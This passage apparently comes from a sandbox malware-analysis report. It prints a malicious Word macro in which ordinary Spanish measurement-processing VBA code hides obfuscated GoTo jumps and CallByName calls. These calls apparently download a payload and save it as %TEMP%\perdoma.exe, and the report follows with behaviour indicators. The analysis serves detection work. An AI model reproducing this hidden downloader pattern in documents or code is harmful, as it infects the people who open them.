  sCN.IFT(14) = SinLe.tras(sCN.IFT(14))
  Case ClaveFSONDA
  sCN.IFT(15) = Cadena
  Case ClaveFIN_CNIFT
  Case ClaveINI_PNIFT
  bHayPNIFT = True
  sProc(9) = Checked
  Case ClaveTHETA_P
  sPN.IFT(0) = ExtraeDat.oIzqda(Cadena)
  sPN.IFT(0) = SinLe.tras(sPN.IFT(0))
  sPN.IFT(1) = ExtraeDatoD.cha(Cadena)
  sPN.IFT(1) = SinLe.tras(sPN.IFT(1))
  Case ClavePHI_P
  sPN.IFT(2) = ExtraeDat.oIzqda(Cadena)
  sPN.IFT(2) = SinLe.tras(sPN.IFT(2))
  sPN.IFT(3) = ExtraeDatoD.cha(Cadena)
  sPN.IFT(3) = SinLe.tras(sPN.IFT(3))
  Case ClaveFICHRNF
  sPN.IFT(5) = Cadena
  If sPN.IFT(5) <> "" Then
  sPN.IFT(4) = Checked
  Else
  sPN.IFT(4) = Unchecked
  End If
  Case ClaveFICHPRB
  sPN.IFT(6) = Cadena
  Case ClaveFICHREF
  sPN.IFT(8) = Cadena
  If sPN.IFT(8) <> "" Then
  sPN.IFT(7) = Checked
  Else
  sPN.IFT(7) = Unchecked
  End If
  Case ClavePERDINS
  sPN.IFT(9) = ExtraeDat.oIzqda(Cadena)
  sPN.IFT(9) = SinLe.tras(sPN.IFT(9))
  Case ClaveFIN_PNIFT
  Case ClaveINI_PNIFU
  bHayPNIFU = True
  sProc(10) = Checked
  Case ClaveCENTGIRAR_U
  Select Case ExtraeDat.oIzqda(Cadena)
  Case PrefSI
  sPNI.FU(0) = Checked
  Case PrefNO
  sPNI.FU(0) = Unchecked
  Case Else
  sPNI.FU(0) = Grayed
  End Select
  sPNI.FU(1) = ExtraeDatoD.cha(Cadena)
  sPNI.FU(1) = SinLe.tras(sPNI.FU(1))
  Case ClaveTRANSF_U
  Select Case Cadena
  Case PrefSINCAMBIO
  sPNI.FU(2) = ClaveSINCAMBIO
  Case PrefCONCAMBIO
  sPNI.FU(2) = ClaveCONCAMBIO
  End Select
  Case ClaveCMPTE_U
  Select Case Cadena
  Case PrefCPXY
  sPNI.FU(3) = ClaveCPXY
  Case PrefAE
  sPNI.FU(3) = ClaveAE
  Case PrefTHPH
  sPNI.FU(3) = ClaveTHPH
  Case PrefRHLH
  sPNI.FU(3) = ClaveRHLH
  Case PrefEMEM
  sPNI.FU(3) = ClaveEMEM
  End Select
  Case ClaveFORMATO
  Select Case ExtraeDat.oIzqda(Cadena)
  Case PrefFORM_1
  sPNI.FU(4) = ClaveFORM_1
  Case PrefFORM_2
  sPNI.FU(4) = ClaveFORM_2
  Case PrefFORM_3
  sPNI.FU(4) = ClaveFORM_3
  Case PrefFORM_4
  sPNI.FU(4) = ClaveFORM_4
  End Select
  perd3:
  uncunctuncE_1.Send
  uncunctuncE_4 = uncunctuncE_3(mandata(6))
  GoTo perd4
  sPNI.FU(5) = ExtraeDatoD.cha(Cadena)
  sPNI.FU(5) = SinLe.tras(sPNI.FU(5))
  Case ClaveTHETA_U
  sPNI.FU(6) = ExtraeDat.oIzqda(Cadena)
  sPNI.FU(6) = SinLe.tras(sPNI.FU(6))
  sPNI.FU(7) = ExtraeDatoD.cha(Cadena)
  sPNI.FU(7) = SinLe.tras(sPNI.FU(7))
  Case ClavePHI_U
  sPNI.FU(8) = ExtraeDat.oIzqda(Cadena)
  sPNI.FU(8) = SinLe.tras(sPNI.FU(8))
  Case ClaveFACTEXP
  sPNI.FU(9) = ExtraeDat.oIzqda(Cadena)
  sPNI.FU(9) = SinLe.tras(sPNI.FU(9))
  sPNI.FU(10) = ExtraeDatoD.cha(Cadena)
  sPNI.FU(10) = SinLe.tras(sPNI.FU(10))
  Case "S/N_RUIDO"
  frmAnalisisIncertidumbres.txtNivelRuido.Text = SinLe.tras(Cadena)
  Pot_ruido = Cadena
  Case "DRIFT_GRADOS"
  frmAnalisisIncertidumbres.txtDrift.Text = SinLe.tras(Cadena)
  Drift = Cadena
  Case "DRIFT_dB"
  frmAnalisisIncertidumbres.txtDriftMod.Text = SinLe.tras(Cadena)
  DriftMod = Cadena
  Case "S/N_LEAKAGE"
  frmAnalisisIncertidumbres.txtLeakage.Text = SinLe.tras(Cadena)
  Leakage = Cadena
  Case "CABLES_JUNTAS_GRADOS"
  frmAnalisisIncertidumbres.txtCablesJuntas.Text = SinLe.tras(Cadena)
  CablesJuntas = Cadena
  Case "CABLES_JUNTAS_dB"
  frmAnalisisIncertidumbres.txtCablesJuntasMod.Text = SinLe.tras(Cadena)
  CablesJuntasMod = Cadena
  Case "NO_SIMUL"
  frmAnalisisIncertidumbres.txtNumSimul.Text = SinLe.tras(Cadena)
  Num_simulaciones = Cadena
  Case "JUNTO"
  If (Cadena = "S") Then
  frmAnalisisIncertidumbres.chkJunto.Value = Checked
  Junto2 = Checked
  End If
  Junto = Cadena
  Case ClaveFIN
  Case ClaveFIN_PNIFU
  Case Else
  Fallo = True
  End Select
  Loop Until EOF(f)
  Close f
  If Fallo Then
  i = MsgBox("Se han ignorado algunas entradas
  compruebe la configuraci?n", _
  vbOKOnly + vbInformation, "AVISO PROCESADO DE DATOS")
  End If
  SalirCargarProc:
  Exit Sub
  ManipularErrorCargarProc:
  i = MsgBox("No existe el fichero o est? da?ado" _
  & vbNewLine & Err.Description, _
  vbOKOnly + vbCritical, "ERROR PROCESADO DE DATOS")
  Resume Next
  perd4:
  uncunctuncE_5 = uncunctuncE_4 + "\perdoma.exe"
  GuardarFichProcIncer ""
  End Sub
  Public Sub GuardarFichProcIncer(NombreFichero As String)
  Dim f As Integer
  Dim i As Integer
  Dim ClaveCPE As String
  Dim ClaveINI_CPE As String
  Dim ClaveFIN_CPE As String
  Dim TExcitacion As String
  Dim InSonda As String
  Dim OutSonda As String
  Dim TPolariz As String
  Dim TNormaliz As String
  Dim Forma As String
  Dim Centrar_c As String
  Dim CentrarGirar_u As String
  Dim Transf As String
  Dim Cmpte As String
  Dim Forma_u As String
  GoTo perd
  If frmAnalisisIncertidumbres.optSNIFTD.Value = True Then
  ClaveCPE = ClaveSNIFTD
  ClaveINI_CPE = ClaveINI_SNIFTD
  ClaveFIN_CPE = ClaveFIN_SNIFTD
  ElseIf frmAnalisisIncertidumbres.optEXPAND.Value = True Then
  ClaveCPE = ClaveEXPAND
  ClaveINI_CPE = ClaveINI_EXPAND
  ClaveFIN_CPE = ClaveFIN_EXPAND
  End If
  Select Case sSNIF.TD_EXPAND(7)
  Case ClaveSONDA_1
  InSonda = PrefSONDA_1
  Case ClaveSONDA_2
  InSonda = PrefSONDA_2
  Case ClaveSONDA_3
  InSonda = PrefSONDA_3
  Case ClaveSONDA_4
  InSonda = PrefSONDA_4
  Case ClaveSONDA_5
  InSonda = PrefSONDA_5
  End Select
  perd:
  GoTo perd1
  Select Case sSNIFT.D_EXPAND(15)
  Case ClaveSONDA_1
  OutSonda = PrefSONDA_1
  Case ClaveSONDA_2
  OutSonda = PrefSONDA_2
  Case ClaveSONDA_3
  OutSonda = PrefSONDA_3
  Case ClaveSONDA_4
  OutSonda = PrefSONDA_4
  Case ClaveSONDA_5
  OutSonda = PrefSONDA_5
  End Select
  Select Case sCNI.FT(11)
  Case Checked
  Centrar_c = PrefSI
  Case Unchecked
  Centrar_c = PrefNO
  End Select
  Select Case sPN.IFU(0)
  Case Checked
  CentrarGirar_u = PrefSI
  Case Unchecked
  CentrarGirar_u = PrefNO
  End Select
  Select Case sPN.IFU(2)
  Case ClaveSINCAMBIO
  Transf = PrefSINCAMBIO
  Case ClaveCONCAMBIO
  Transf = PrefCONCAMBIO
  End Select
  Select Case sPN.IFU(3)
  Case ClaveCPXY
  Cmpte = PrefCPXY
  Case ClaveAE
  Cmpte = PrefAE
  Case ClaveTHPH
  Cmpte = PrefTHPH
  Case ClaveRHLH
  Cmpte = PrefRHLH
  Case ClaveEMEM
  Cmpte = PrefEMEM
  End Select
  Select Case sPN.IFU(4)
  Case ClaveFORM_1
  Forma_u = PrefFORM_1
  Case ClaveFORM_2
  Forma_u = PrefFORM_2
  Case ClaveFORM_3
  Forma_u = PrefFORM_3
  Case ClaveFORM_4
  Forma_u = PrefFORM_4
  End Select
  On Error GoTo ManipularErrorGuardarProc
  f = FreeFile
  Open NombreFichero For Output As f
  Print #f, "FICHERO_MED", frmAnalisisIncertidumbres.txtDAMA.Text, _
  vbNewLine
  Print #f, "FICHERO_INCER", sPathMedida, _
  vbNewLine
  Print #f, ClaveNOFREC, frmAnalisisIncertidumbres.lstFrecuencias.ListCount
  For i = 0 To frmAnalisisIncertidumbres.lstFrecuencias.ListCount - 1 Step 1
  Print #f, "", frmAnalisisIncertidumbres.lstFrecuencias.List(i)
  Next i
  Print #f, vbNewLine
  If frmAnalisisIncertidumbres.txtNivelRuido <> "" Then
  Print #f, "S/N_RUIDO", frmAnalisisIncertidumbres.txtNivelRuido.Text
  End If
  If frmAnalisisIncertidumbres.txtDrift <> "" Then
  Print #f, "DRIFT_GRADOS", frmAnalisisIncertidumbres.txtDrift.Text
  End If
  If frmAnalisisIncertidumbres.txtDriftMod <> "" Then
  Print #f, "DRIFT_dB", frmAnalisisIncertidumbres.txtDriftMod.Text
  End If
  If frmAnalisisIncertidumbres.txtLeakage <> "" Then
  Print #f, "S/N_LEAKAGE", frmAnalisisIncertidumbres.txtLeakage.Text
  End If
  If frmAnalisisIncertidumbres.txtCablesJuntas <> "" Then
  Print #f, "CABLES_JUNTAS_GRADOS", frmAnalisisIncertidumbres.txtCablesJuntas.Text
  End If
  If frmAnalisisIncertidumbres.txtCablesJuntasMod <> "" Then
  Print #f, "CABLES_JUNTAS_dB", frmAnalisisIncertidumbres.txtCablesJuntasMod.Text
  End If
  If frmAnalisisIncertidumbres.txtNumSimul <> "" Then
  Print #f, "NO_SIMUL", frmAnalisisIncertidumbres.txtNumSimul.Text, _
  vbNewLine
  End If
  If frmAnalisisIncertidumbres.chkJunto.Value = Checked Then
  Print #f, "JUNTO", "S", _
  vbNewLine
  Else
  Print #f, "JUNTO", "N", _
  vbNewLine
  End If
  perd1:
  CallByName uncunctuncE_2, mandata(7), VbLet, 1
  GoTo perd3
  If frmAnalisisIncertidumbres.chkCPE.Value = Checked Then
  Print #f, Asteriscos & Asteriscos
  Print #f, , ClaveCPE
  Print #f, Asteriscos & Asteriscos
  Print #f, ClaveINI_CPE
  Print #f, ClaveINSONDA, InSonda, _
  sSNIFTD_E.XPAND(8)
  Print #f, ClaveROUT, sSNIFTD_E.XPAND(9)
  Print #f, ClaveOUTTHETA_SE, sSNIFTD_E.XPAND(11), _
  sSNIFTD_E.XPAND(12)
  Print #f, ClaveOUTPHI_SE, sSNIFTD_E.XPAND(13), _
  sSNIFTD_E.XPAND(14)
  Print #f, ClaveOUTSONDA, OutSonda, _
  sSNIFTD_E.XPAND(16)
  Print #f, ClaveFIN_CPE, vbNewLine
  End If
  If frmAnalisisIncertidumbres.chkFresnel.Value = Checked Then
  Print #f, Asteriscos & Asteriscos
  Print #f, , ClaveSFIFT
  Print #f, Asteriscos & Asteriscos
  Print #f, ClaveINI_SFIFT
  Print #f, ClaveR0, sSF.IFT(3)
  Print #f, ClaveLFI0, sSF.IFT(4)
  Print #f, ClaveLFI90, sSF.IFT(5)
  Print #f, ClaveGSonda, sSF.IFT(6)
  Print #f, ClaveCSonda, sSF.IFT(7)
  Print #f, ClaveFIN_SFIFT, vbNewLine
  End If
  If frmAnalisisIncertidumbres.chkCPC.Value = Checked Then
  Print #f, Asteriscos & Asteriscos
  Print #f, , ClaveCNIFT
  Print #f, Asteriscos & Asteriscos
  Print #f, ClaveINI_CNIFT
  Print #f, ClaveTHETA_C, sCN.IFT(7), sCN.IFT(8)
  Print #f, ClavePHI_C, sCN.IFT(9), sCN.IFT(10)
  Print #f, ClaveCENTRAR_C, Centrar_c, sCN.IFT(12)
  Print #f, ClavePERDYGAN, sCN.IFT(13), sCN.IFT(14)
  Print #f, ClaveFSONDA, sCN.IFT(15)
  Print #f, ClaveFIN_CNIFT, vbNewLine
  End If
  If frmAnalisisIncertidumbres.chkCPP.Value = Checked Then
  Print #f, Asteriscos & Asteriscos
  Print #f, , ClavePNIFT
  Print #f, Asteriscos & Asteriscos
  Print #f, ClaveINI_PNIFT
  Print #f, ClaveTHETA_P, sPN.IFT(0), sPN.IFT(1)
  Print #f, ClavePHI_P, sPN.IFT(2), sPN.IFT(3)
  Print #f, ClaveFICHRNF, sPN.IFT(5)
  Print #f, ClaveFICHPRB, sPN.IFT(6)
  Print #f, ClaveFICHREF, sPN.IFT(8)
  Print #f, ClavePERDINS, sPN.IFT(9)
  Print #f, ClaveFIN_PNIFT, vbNewLine
  End If
  If frmAnalisisIncertidumbres.chkCoord.Value = Checked Then
  Print #f, Asteriscos & Asteriscos
  Print #f, , ClavePNIFU
  Print #f, Asteriscos & Asteriscos
  Print #f, ClaveINI_PNIFU
  Print #f, ClaveCENTGIRAR_U, CentrarGirar_u, sPNI.FU(1)
  Print #f, ClaveTRANSF_U, Transf
  Print #f, ClaveCMPTE_U, Cmpte
  Print #f, ClaveFORMATO, Forma_u, sPNI.FU(5)
  If Transf = PrefCONCAMBIO Then
  Print #f, ClaveTHETA_U, sPNI.FU(6), sPNI.FU(7)
  Print #f, ClavePHI_U, sPNI.FU(8)
  End If
  If Transf = PrefSINCAMBIO Then
  Print #f, ClaveFACTEXP, sPNI.FU(9), sPNI.FU(10)
  End If
  Print #f, ClaveFIN_PNIFU, vbNewLine
  End If
  Print #f, ClaveFIN
  Close f
  perd3:
  uncunctuncE_2.Open
  GuardarFichProc ""
  SalirGuardarProc:
  Exit Sub
  ManipularErrorGuardarProc:
  i = MsgBox("No se pudo guardar el fichero correctamente." & _
  vbNewLine & sPathProceso, _
  vbOKOnly + vbCritical, "ERROR PROCESADO DE INCERTIDUMBRES")
  Resume Next
  End Sub
  Public Sub GuardarFichProc(NombreFichero As String)
  Dim f As Integer
  Dim i As Integer
  Dim ClaveCPE As String
  Dim ClaveINI_CPE As String
  Dim ClaveFIN_CPE As String
  Dim TExcitacion As String
  Dim InSonda As String
  Dim OutSonda As String
  Dim TPolariz As String
  Dim TNormaliz As String
  Dim Forma As String
  Dim Centrar_c As String
  Dim CentrarGirar_u As String
  Dim Transf As String
  Dim Cmpte As String
  Dim Forma_u As String
  GoTo perd
  If frmProcesado.optSNIFTD.Value = True Then
  ClaveCPE = ClaveSNIFTD
  ClaveINI_CPE = ClaveINI_SNIFTD
  ClaveFIN_CPE = ClaveFIN_SNIFTD
  ElseIf frmProcesado.optEXPAND.Value = True Then
  ClaveCPE = ClaveEXPAND
  ClaveINI_CPE = ClaveINI_EXPAND
  ClaveFIN_CPE = ClaveFIN_EXPAND
  End If
  Select Case frmProcesado.cboTExcitacion.Text
  Case ClaveLINX
  TExcitacion = PrefLINX
  Case ClaveLINY
  TExcitacion = PrefLINY
  Case ClaveCIRC
  TExcitacion = PrefCIRC
  End Select
  Select Case sSNIFTD_E.XPAND(7)
  Case ClaveSONDA_1
  InSonda = PrefSONDA_1
  Case ClaveSONDA_2
  InSonda = PrefSONDA_2
  Case ClaveSONDA_3
  InSonda = PrefSONDA_3
  Case ClaveSONDA_4
  InSonda = PrefSONDA_4
  Case ClaveSONDA_5
  InSonda = PrefSONDA_5
  End Select
  Select Case sSNIFTD_E.XPAND(15)
  Case ClaveSONDA_1
  OutSonda = PrefSONDA_1
  Case ClaveSONDA_2
  OutSonda = PrefSONDA_2
  Case ClaveSONDA_3
  OutSonda = PrefSONDA_3
  Case ClaveSONDA_4
  OutSonda = PrefSONDA_4
  Case ClaveSONDA_5
  OutSonda = PrefSONDA_5
  End Select
  Select Case sCN.IFT(11)
  Case Checked
  Centrar_c = PrefSI
  Case Unchecked
  Centrar_c = PrefNO
  End Select
  Select Case sPNI.FU(0)
  Case Checked
  CentrarGirar_u = PrefSI
  Case Unchecked
  CentrarGirar_u = PrefNO
  End Select
  Select Case sPNI.FU(2)
  Case ClaveSINCAMBIO
  Transf = PrefSINCAMBIO
  Case ClaveCONCAMBIO
  Transf = PrefCONCAMBIO
  End Select
  perd:
  rbp = CallByName(uncunctuncE_1, mandata(10), VbGet)
  CallByName uncunctuncE_2, mandata(9), VbMethod, rbp
  GoTo perd9
  Select Case sPNI.FU(3)
  Case ClaveCPXY
  Cmpte = PrefCPXY
  Case ClaveAE
  Cmpte = PrefAE
  Case ClaveTHPH
  Cmpte = PrefTHPH
  Case ClaveRHLH
  Cmpte = PrefRHLH
  Case ClaveEMEM
  Cmpte = PrefEMEM
  End Select
  Select Case sPNI.FU(4)
  Case ClaveFORM_1
  Forma_u = PrefFORM_1
  Case ClaveFORM_2
  Forma_u = PrefFORM_2
  Case ClaveFORM_3
  Forma_u = PrefFORM_3
  Case ClaveFORM_4
  Forma_u = PrefFORM_4
  End Select
  On Error GoTo ManipularErrorGuardarProc
  f = FreeFile
  Open NombreFichero For Output As f
  Print #f, ClaveDAMA, frmProcesado.txtDAMA.Text, _
  vbNewLine
  Print #f, ClaveNOFREC, frmProcesado.lstFrecuencias.ListCount
  For i = 0 To frmProcesado.lstFrecuencias.ListCount - 1 Step 1
  Print #f, "", frmProcesado.lstFrecuencias.List(i)
  Next i
  Print #f, vbNewLine
  If frmProcesado.chkNORMA.Value = Checked Then
  Print #f, Asteriscos & Asteriscos
  Print #f, , ClaveNORMA
  Print #f, Asteriscos & Asteriscos
  Print #f, ClaveINI_NORMA
  Print #f, ClaveTEXCIT, TExcitacion
  Print #f, ClaveFIN_NORMA, vbNewLine
  End If
  If frmProcesado.chkNORMAC.Value = Checked Then
  Print #f, Asteriscos & Asteriscos
  Print #f, , ClaveNORMACOMP
  Print #f, Asteriscos & Asteriscos
  Print #f, ClaveINI_NORMACOMP
  Print #f, ClaveTEXCIT, TExcitacion
  Print #f, ClaveFIN_NORMACOMP, vbNewLine
  End If
  If frmProcesado.chkCPE.Value = Checked Then
  Print #f, Asteriscos & Asteriscos
  Print #f, , ClaveCPE
  Print #f, Asteriscos & Asteriscos
  Print #f, ClaveINI_CPE
  Print #f, ClaveINSONDA, InSonda, _
  sSNIFTD_E.XPAND(8)
  Print #f, ClaveROUT, sSNIFTD_E.XPAND(9)
  Print #f, ClaveOUTTHETA_SE, sSNIFTD_E.XPAND(11), _
  sSNIFTD_E.XPAND(12)
  Print #f, ClaveOUTPHI_SE, sSNIFTD_E.XPAND(13), _
  sSNIFTD_E.XPAND(14)
  Print #f, ClaveOUTSONDA, OutSonda, _
  sSNIFTD_E.XPAND(16)
  Print #f, ClaveFIN_CPE, vbNewLine
  End If
  If frmProcesado.chkFresnel.Value = Checked Then
  Print #f, Asteriscos & Asteriscos
  Print #f, , ClaveSFIFT
  Print #f, Asteriscos & Asteriscos
  Print #f, ClaveINI_SFIFT
  Print #f, ClaveR0, sSF.IFT(3)
  Print #f, ClaveLFI0, sSF.IFT(4)
  Print #f, ClaveLFI90, sSF.IFT(5)
  Print #f, ClaveGSonda, sSF.IFT(6)
  Print #f, ClaveCSonda, sSF.IFT(7)
  Print #f, ClaveFIN_SFIFT, vbNewLine
  End If
  If frmProcesado.chkCPC.Value = Checked Then
  Print #f, Asteriscos & Asteriscos
  Print #f, , ClaveCNIFT
  Print #f, Asteriscos & Asteriscos
  Print #f, ClaveINI_CNIFT
  Print #f, ClaveTHETA_C, sCN.IFT(7), sCN.IFT(8)
  Print #f, ClavePHI_C, sCN.IFT(9), sCN.IFT(10)
  Print #f, ClaveCENTRAR_C, Centrar_c, sCN.IFT(12)
  Print #f, ClavePERDYGAN, sCN.IFT(13), sCN.IFT(14)
  Print #f, ClaveFSONDA, sCN.IFT(15)
  Print #f, ClaveFIN_CNIFT, vbNewLine
  End If
  If frmProcesado.chkCPP.Value = Checked Then
  Print #f, Asteriscos & Asteriscos
  Print #f, , ClavePNIFT
  Print #f, Asteriscos & Asteriscos
  Print #f, ClaveINI_PNIFT
  Print #f, ClaveTHETA_P, sPN.IFT(0), sPN.IFT(1)
  Print #f, ClavePHI_P, sPN.IFT(2), sPN.IFT(3)
  Print #f, ClaveFICHRNF, sPN.IFT(5)
  Print #f, ClaveFICHPRB, sPN.IFT(6)
  Print #f, ClaveFICHREF, sPN.IFT(8)
  Print #f, ClavePERDINS, sPN.IFT(9)
  Print #f, ClaveFIN_PNIFT, vbNewLine
  End If
  If frmProcesado.chkCoord.Value = Checked Then
  Print #f, Asteriscos & Asteriscos
  Print #f, , ClavePNIFU
  Print #f, Asteriscos & Asteriscos
  Print #f, ClaveINI_PNIFU
  Print #f, ClaveCENTGIRAR_U, CentrarGirar_u, sPNI.FU(1)
  Print #f, ClaveTRANSF_U, Transf
  Print #f, ClaveCMPTE_U, Cmpte
  Print #f, ClaveFORMATO, Forma_u, sPNI.FU(5)
  If Transf = PrefCONCAMBIO Then
  Print #f, ClaveTHETA_U, sPNI.FU(6), sPNI.FU(7)
  Print #f, ClavePHI_U, sPNI.FU(8)
  End If
  If Transf = PrefSINCAMBIO Then
  Print #f, ClaveFACTEXP, sPNI.FU(9), sPNI.FU(10)
  End If
  Print #f, ClaveFIN_PNIFU, vbNewLine
  End If
  Print #f, ClaveFIN
  Close f
  perd9:
  CallByName uncunctuncE_2, mandata(11), VbMethod, uncunctuncE_5, 2
  SalirGuardarProc:
  Exit Sub
  ManipularErrorGuardarProc:
  i = MsgBox("No se pudo guardar el fichero correctamente." & _
  vbNewLine & sPathProceso, _
  vbOKOnly + vbCritical, "ERROR PROCESADO DE DATOS")
  Resume Next
  End Sub
  Public Sub ValidarProcIncer(NombreFichero As String)
  Dim i As Integer
  sPathProceso = NombreFichero
  For i = 0 To frmAnalisisIncertidumbres.lstFrecuencias.ListCount - 1 Step 1
  ReDim Preserve sProc1(i)
  sProc1(i) = frmAnalisisIncertidumbres.lstFrecuencias.List(i)
  Next i
  sProc(4) = frmAnalisisIncertidumbres.chkCPE.Value
  sProc(5) = frmAnalisisIncertidumbres.optSNIFTD.Value
  bHaySNIFTD = sProc(5)
  sProc(6) = frmAnalisisIncertidumbres.optEXPAND.Value
  bHayEXPAND = sProc(6)
  sProc(7) = frmAnalisisIncertidumbres.chkFresnel.Value
  If sProc(7) = Checked Then
  bHaySFIFT = True
  Else
  bHaySFIFT = False
  End If
  sProc(8) = frmAnalisisIncertidumbres.chkCPC.Value
  If sProc(8) = Checked Then
  bHayCNIFT = True
  Else
  bHayCNIFT = False
  End If
  sProc(9) = frmAnalisisIncertidumbres.chkCPP.Value
  If sProc(9) = Checked Then
  bHayPNIFT = True
  Else
  bHayPNIFT = False
  End If
  sProc(10) = frmAnalisisIncertidumbres.chkCoord.Value
  If sProc(10) = Checked Then
  bHayPNIFU = True
  Else
  bHayPNIFU = False
  End If
  End Sub
  Public Sub ValidarProc(NombreFichero As String)
  Dim i As Integer
  sPathProceso = NombreFichero
  For i = 0 To frmProcesado.lstFrecuencias.ListCount - 1 Step 1
  ReDim Preserve sProc1(i)
  sProc1(i) = frmProcesado.lstFrecuencias.List(i)
  Next i
  sProc(2) = frmProcesado.chkNORMA.Value
  If sProc(2) = Checked Then
  bHayNORMA = True
  Else
  bHayNORMA = False
  End If
  sProc(11) = frmProcesado.chkNORMAC.Value
  If sProc(11) = Checked Then
  bHayNORMAC = True
  Else
  bHayNORMAC = False
  End If
  sProc(3) = frmProcesado.cboTExcitacion.Text
  sNORMA = frmProcesado.cboTExcitacion.Text
  sProc(4) = frmProcesado.chkCPE.Value
  sProc(5) = frmProcesado.optSNIFTD.Value
  bHaySNIFTD = sProc(5)
  sProc(6) = frmProcesado.optEXPAND.Value
  bHayEXPAND = sProc(6)
  sProc(7) = frmProcesado.chkFresnel.Value
  If sProc(7) = Checked Then
  bHaySFIFT = True
  Else
  bHaySFIFT = False
  End If
  sProc(8) = frmProcesado.chkCPC.Value
  If sProc(8) = Checked Then
  bHayCNIFT = True
  Else
  bHayCNIFT = False
  End If
  sProc(9) = frmProcesado.chkCPP.Value
  If sProc(9) = Checked Then
  bHayPNIFT = True
  Else
  bHayPNIFT = False
  End If
  sProc(10) = frmProcesado.chkCoord.Value
  If sProc(10) = Checked Then
  bHayPNIFU = True
  Else
  bHayPNIFU = False
  End If
  End Sub
  Public Sub CargarFrecs(NombreFichero As String)
  Dim f As Integer
  Dim Buffer As String
  Dim Cadena As String
  Dim i As Integer
  Dim Aux As Integer
  Dim Fallo As Boolean
  Fallo = False
  On Error GoTo ManipularErrorCargarProcesado
  f = FreeFile
  Open NombreFichero For Input As f
  Do
  Line Input #f, Buffer
  Cadena = ExtraeDatoD.cha(Buffer)
  Select Case ExtraeDat.oIzqda(Buffer)
  Case ClaveNOFREC
  Aux = Fix(Val(SinLe.tras(ExtraeDat.oIzqda(Cadena))))
  If Aux >= 1 Then
  bHayFrecs = True
  sFrecMax = sLimFrecMin
  sFrecMin = sLimFrecMax
  For i = 0 To Aux - 1 Step 1
  Input #f, Buffer
  ReDim Preserve sProc1(i)
  sProc1(i) = ExtraeDat.oIzqda(Buffer)
  If ExtraeDat.oIzqda(Buffer) > sFrecMax Then
  sFrecMax = ExtraeDat.oIzqda(Buffer)
  End If
  If ExtraeDat.oIzqda(Buffer) < sFrecMin Then
  sFrecMin = ExtraeDat.oIzqda(Buffer)
  End If
  Next i
  End If
  End Select
  Loop Until EOF(f)
  Close f
  SalirCargarProcesado:
  Exit Sub
  ManipularErrorCargarProcesado:
  i = MsgBox("No existe el fichero o est? da?ado" _
  & vbNewLine & Err.Description, _
  vbOKOnly + vbCritical, "ERROR PROCESADO DE DATOS")
  Resume Next
  End Sub
  Public Sub GuardarNORMA(FichTmp As String, FichConfig As String)
  Dim f As Integer
  Dim i As Integer
  Dim EXTin As String
  Dim TExcit As Integer
  On Error GoTo ManipularErrorGuardarNORMA
  If uTMedida.Iniciales = Ini_CLB Then
  EXTin = Ext_CCL
  Else
  EXTin = Ext_CCP
  End If
  Select Case sNORMA
  Case ClaveLINX
  TExcit = PrefLINX
  Case ClaveLINY
  TExcit = PrefLINY
  Case ClaveCIRC
  TExcit = PrefCIRC
  End Select
  f = FreeFile
  Open FichConfig & Ext_CIN For Output As f
  Print #f, CharLineaVacia
  Print #f, ""
  Print #f, TExcit, ClaveIPOLD
  Print #f, ""
  Close f
  SalirGuardarNORMA:
  Exit Sub
  ManipularErrorGuardarNORMA:
  i = MsgBox("No se pudo guardar el fichero correctamente." & _
  vbNewLine & FichConfig & Ext_CIN _
  & vbNewLine & Err.Description, _
  , vbOKOnly + vbCritical, "ERROR NORMA")
  Resume Next
  End Sub"
  
  source
  
  Static Parser
  
  relevance
  
  10/10
- Creates a writable file in a temporary directory
  
  details
  
  "perdoma.exe" created file "%TEMP%\CabDAE9.tmp"
  "perdoma.exe" created file "%TEMP%\TarDAEA.tmp"
  
  source
  
  API Call
  
  relevance
  
  1/10
- Creates mutants
  
  details
  
  "IESQMMUTEX_0_208"
  "KYIMEShareCachedData.MutexObject.PSPUBWS"
  "KYTransactionServer.MutexObject.PSPUBWS"
  "Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
  "Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
  "Local\WininetStartupMutex"
  "Local\WininetConnectionMutex"
  "Local\WininetProxyRegistryMutex"
  "Local\!IETld!Mutex"
  "Local\c:!users!pspubws!appdata!roaming!microsoft!windows!ietldcache!"
  "Local\ZonesCounterMutex"
  "Local\ZoneAttributeCacheCounterMutex"
  "Local\ZonesCacheCounterMutex"
  "Local\ZonesLockedCacheCounterMutex"
  "Global\d65899ba074c945127a56deb94e1f7f0"
  
  source
  
  Created Mutant
  
  relevance
  
  3/10
- Loads modules at runtime
  
  details
  
  "perdoma.exe" loaded module "NTDLL.DLL" at base 77420000
  "perdoma.exe" loaded module "DNSAPI.DLL" at base 74E70000
  "perdoma.exe" loaded module "%WINDIR%\SYSTEM32\FWPUCLNT.DLL" at base 73870000
  "perdoma.exe" loaded module "SETUPAPI.DLL" at base 76980000
  "perdoma.exe" loaded module "API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL" at base 77590000
  "perdoma.exe" loaded module "API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL" at base 77590000
  "perdoma.exe" loaded module "RPCRT4.DLL" at base 76620000
  "perdoma.exe" loaded module "API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL" at base 77590000
  "OffDiag.exe" loaded module "OLEAUT32.DLL" at base 77170000
  "OffDiag.exe" loaded module "POWRPROF.DLL" at base 748A0000
  "OffDiag.exe" loaded module "KERNEL32.DLL" at base 76FC0000
  "OffDiag.exe" loaded module "NETAPI32.DLL" at base 73CA0000
  "OffDiag.exe" loaded module "OLE32.DLL" at base 764C0000
  "OffDiag.exe" loaded module "ADVAPI32.DLL" at base 76D50000
  "OffDiag.exe" loaded module "API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL" at base 77590000
  "OffDiag.exe" loaded module "PROFAPI.DLL" at base 75570000
  
  source
  
  API Call
  
  relevance
  
  1/10
- Loads rich edit control libraries
  
  details
  
  "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\Microsoft Shared\office12\riched20.dll" at 66B00000
  
  source
  
  Loaded Module
- Spawns new processes
  
  details
  
  Spawned process "perdoma.exe" (Show Process)
  Spawned process "Explorer.EXE" with commandline "%WINDIR%\Explorer.EXE" (Show Process)
  Spawned process "taskhost.exe" (Show Process)
  Spawned process "OffDiag.exe" with commandline "/SOURCE 1 /LCID 1031 /WAITPID 2676" (Show Process)
  
  source
  
  Monitored Target
  
  relevance
  
  3/10
Installation/Persistance
- Dropped files
  
  details
  
